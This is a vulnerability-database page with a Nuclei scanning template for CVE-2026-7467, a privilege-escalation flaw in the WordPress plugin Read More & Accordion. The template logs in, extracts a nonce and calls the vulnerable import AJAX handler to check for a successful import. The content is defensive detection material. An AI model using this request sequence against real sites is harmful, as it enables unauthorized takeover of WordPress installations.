Lucene search
+L

Read More & Accordion <= 3.5.7 - Authenticated Privilege Escalation

🗓️ 26 Aug 2026 05:24:15Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 2 Views

Privilege escalation in Read More & Accordion through 3.5.7 via crafted JSON enabling site takeover.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-7467
20 May 202601:25
attackerkb
circl
Circl
CVE-2026-7467
20 May 202603:00
circl
cnnvd
CNNVD
WordPress plugin Read More & Accordion 安全漏洞
20 May 202600:00
cnnvd
cve
CVE
CVE-2026-7467
20 May 202601:25
cve
cvelist
Cvelist
CVE-2026-7467 Read More & Accordion <= 3.5.7 - Privilege Escalation via importData
20 May 202601:25
cvelist
euvd
EUVD
EUVD-2026-31030
20 May 202601:25
euvd
nvd
NVD
CVE-2026-7467
20 May 202602:16
nvd
patchstack
Patchstack
WordPress Read More & Accordion plugin <= 3.5.7 - Privilege Escalation vulnerability
25 May 202607:30
patchstack
ptsecurity
Positive Technologies
PT-2026-42073
19 May 202600:00
ptsecurity
redhatcve
RedhatCVE
CVE-2026-7467
5 Jun 202619:22
redhatcve
id: CVE-2026-7467

info:
  name: Read More & Accordion <= 3.5.7 - Authenticated Privilege Escalation
  author: zer0p0int
  severity: high
  description: |
    The Read More & Accordion (expand-maker) plugin for WordPress through 3.5.7 allows privilege escalation due to improper validation in the importData AJAX handler (yrm_import_data action). An authenticated user with plugin access can upload a crafted JSON attachment to insert arbitrary rows into WordPress database tables, including those that control user roles and capabilities, potentially leading to site takeover.
  impact: |
    Authenticated attackers can insert arbitrary rows into any WordPress database table, allowing creation of a new administrator account and full takeover of the site.
  remediation: |
    Update to the latest version of the Read More & Accordion (expand-maker) plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/adf51c03-b0bb-4864-b64d-6b0cba4b0130
    - https://wordpress.org/plugins/expand-maker/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-7467
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-7467
    epss-score: 0.00357
    epss-percentile: 0.27933
    cwe-id: CWE-269
  metadata:
    verified: false
    max-request: 4
    vendor: radmore
    product: expand-maker
    framework: wordpress
    publicwww-query: "/wp-content/plugins/expand-maker/"
  tags: cve,cve2026,wp,wordpress,wp-plugin,privilege-escalation,ssrf,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2F&testcookie=1

      - |
        GET /wp-admin/admin.php?page=readMore HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=yrm_import_data&ajaxNonce={{yrm_nonce}}&attachmentUrl={{BaseURL}}/wp-json/

    matchers:
      - type: word
        part: body_2
        words:
          - "yrmBackendData"

      - type: word
        part: body_3
        words:
          - '"success":true'
          - "Data import successful"
        condition: and

    extractors:
      - type: regex
        name: yrm_nonce
        group: 1
        part: body_2
        regex:
          - 'yrmBackendData = \{"nonce":"([a-f0-9]+)"'
        internal: true
# digest: 4b0a00483046022100b5364a27869d2010f6f8cf84988d240455889e9cbdfb156de81b954ff3d32dc3022100a437fccc616ddaef221b5cf30225468895bb0be02aa19bc136a838913a6b0ca8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jul 2026 09:24Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.18.8
EPSS0.00357
2